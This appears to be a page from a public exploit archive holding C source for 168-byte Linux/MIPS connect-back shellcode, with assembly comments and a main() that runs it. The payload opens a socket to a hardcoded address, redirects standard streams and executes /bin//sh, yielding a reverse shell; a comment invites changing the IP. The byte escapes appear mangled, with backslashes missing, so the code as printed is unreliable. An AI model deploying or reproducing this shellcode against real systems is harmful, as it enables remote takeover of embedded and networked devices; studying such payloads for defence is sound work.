Linux/MIPS - connect back shellcode (port 0x7a69)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.
# Published : 2011-12-10
# Author :
# Previous Title : OSX universal ROP shellcode
# Next Title : Linux x86 egghunt shellcode
/*
 * Title: Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.
 * Author: rigan - imrigan [sobachka] gmail.com
 */

#include <stdio.h>

char sc[] =
         "x24x0fxffxfd"        // li      t7,-3
         "x01xe0x20x27"        // nor     a0,t7,zero
         "x01xe0x28x27"        // nor     a1,t7,zero
         "x28x06xffxff"        // slti    a2,zero,-1
         "x24x02x10x57"        // li      v0,4183 ( sys_socket )
         "x01x01x01x0c"        // syscall 0x40404
	 
         "xafxa2xffxff"        // sw      v0,-1(sp)
         "x8fxa4xffxff"        // lw      a0,-1(sp)
         "x24x0fxffxfd"        // li      t7,-3 ( sa_family = AF_INET )
         "x01xe0x78x27"        // nor     t7,t7,zero
         "xafxafxffxe0"        // sw      t7,-32(sp) 
         "x3cx0ex7ax69"        // lui     t6,0x7a69 ( sin_port = 0x7a69 )
         "x35xcex7ax69"        // ori     t6,t6,0x7a69
         "xafxaexffxe4"        // sw      t6,-28(sp)
         
      /* ====================  You can change ip here ;) ====================== */
         "x3cx0dxc0xa8"        // lui     t5,0xc0a8 ( sin_addr = 0xc0a8 ... 
         "x35xadx01x64"        // ori     t5,t5,0x164           ...0164 )
      /* ====================================================================== */
      
         "xafxadxffxe6"        // sw      t5,-26(sp)
         "x23xa5xffxe2"        // addi    a1,sp,-30
         "x24x0cxffxef"        // li      t4,-17 ( addrlen = 16 )     
         "x01x80x30x27"        // nor     a2,t4,zero 
         "x24x02x10x4a"        // li      v0,4170 ( sys_connect ) 
         "x01x01x01x0c"        // syscall 0x40404
	 
         "x24x0fxffxfd"        // li      t7,-3
         "x01xe0x28x27"        // nor     a1,t7,zero
         "x8fxa4xffxff"        // lw      a0,-1(sp)
//dup2_loop:
         "x24x02x0fxdf"        // li      v0,4063 ( sys_dup2 )
         "x01x01x01x0c"        // syscall 0x40404
         "x20xa5xffxff"        // addi    a1,a1,-1
         "x24x01xffxff"        // li      at,-1
         "x14xa1xffxfb"        // bne     a1,at, dup2_loop
	 
         "x28x06xffxff"        // slti    a2,zero,-1
         "x3cx0fx2fx2f"        // lui     t7,0x2f2f
         "x35xefx62x69"        // ori     t7,t7,0x6269
         "xafxafxffxf4"        // sw      t7,-12(sp)
         "x3cx0ex6ex2f"        // lui     t6,0x6e2f
         "x35xcex73x68"        // ori     t6,t6,0x7368
         "xafxaexffxf8"        // sw      t6,-8(sp)
         "xafxa0xffxfc"        // sw      zero,-4(sp)
         "x27xa4xffxf4"        // addiu   a0,sp,-12
         "x28x05xffxff"        // slti    a1,zero,-1
         "x24x02x0fxab"        // li      v0,4011 ( sys_execve )
         "x01x01x01x0c";       // syscall 0x40404
         
void main(void)
{
       
       void(*s)(void);
       printf("size: %dn", sizeof(sc));
       s = sc;
       s();
}